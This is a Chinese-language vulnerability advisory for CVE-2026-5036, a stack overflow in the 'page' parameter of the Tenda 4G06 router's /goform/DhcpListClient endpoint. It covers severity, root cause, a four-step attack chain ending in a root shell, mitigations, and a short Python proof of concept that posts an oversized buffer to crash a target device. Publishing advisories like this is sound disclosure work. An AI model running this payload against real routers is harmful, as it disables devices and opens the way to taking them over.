CVE-2026-5036 CVSS 8.8 高危

CVE-2026-5036 Tenda 4G06路由器栈溢出漏洞

披露日期: 2026-03-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5036

漏洞类型

栈溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda 4G06

漏洞概述

该漏洞存在于Tenda 4G06路由器04.06.01.29版本中。由于/goform/DhcpListClient接口的fromDhcpListClient函数未正确过滤“page”参数，导致远程攻击者可通过发送特制恶意数据包触发栈溢出。攻击者无需用户交互即可利用此漏洞，可能导致设备崩溃或执行任意代码，获取系统最高权限，严重影响设备的安全性、完整性和可用性。

技术细节

该漏洞根源在于Tenda 4G06固件对HTTP请求参数处理的逻辑缺陷。具体而言，在/goform/DhcpListClient处理端点对应的fromDhcpListClient函数中，程序使用了不安全的字符串操作函数（如strcpy）将用户提交的“page”参数值直接复制到栈上的局部变量缓冲区。由于未对输入长度进行严格的边界检查，当传入的参数长度超过缓冲区大小时，多余的数据将溢出缓冲区并覆盖栈上的相邻内存区域。攻击者能够利用这一缺陷，通过远程发送特制的HTTP请求注入恶意机器码。成功利用后，攻击者可劫持控制流，以Root权限执行任意系统命令，进而植入后门或窃取数据。

攻击链分析

STEP 1

信息收集

攻击者扫描网络，识别暴露在互联网上的Tenda 4G06设备，并确认其固件版本为04.06.01.29。

STEP 2

漏洞利用

攻击者向目标设备的/goform/DhcpListClient端点发送HTTP POST请求，在'page'参数中填充超长恶意数据，覆盖栈上的返回地址。

STEP 3

代码执行

程序流程被劫持，跳转至攻击者注入的Shellcode执行，攻击者获取设备的Root权限Shell。

STEP 4

持久化控制

攻击者修改系统配置，植入后门程序，建立长期控制通道，窃取数据或作为跳板攻击内网。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    """
    PoC for CVE-2026-5036
    Sends a malicious payload to the 'page' parameter to trigger stack overflow.
    """
    url = f"http://{target_ip}/goform/DhcpListClient"
    
    # Malicious buffer to overflow the stack
    # Adjust length based on specific analysis of the binary
    payload_buffer = b"A" * 500 
    
    data = {
        "page": payload_buffer
    }
    
    try:
        print(f"[+] Sending exploit payload to {target_ip}...")
        response = requests.post(url, data=data, timeout=5)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if target crashed.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Connection error or service crashed: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_ip>")
    else:
        exploit(sys.argv[1])

影响范围

Tenda 4G06 04.06.01.29

防御指南

临时缓解措施

建议用户立即检查设备固件版本。若无法立即升级，应将路由器管理界面放置在受信任的内网环境中，并配置严格的访问控制列表（ACL），仅允许特定IP地址进行管理操作，同时监控网络流量中是否存在针对/goform/DhcpListClient的可疑请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5036
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5036
3 Details https://www.cvedetails.com/cve/CVE-2026-5036/
4 VulDB https://vuldb.com/cve/CVE-2026-5036
5 Link https://github.com/Kiciot/cve/issues/1
6 Link https://vuldb.com/submit/778625
7 Link https://vuldb.com/vuln/353962
8 Link https://vuldb.com/vuln/353962/cti
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表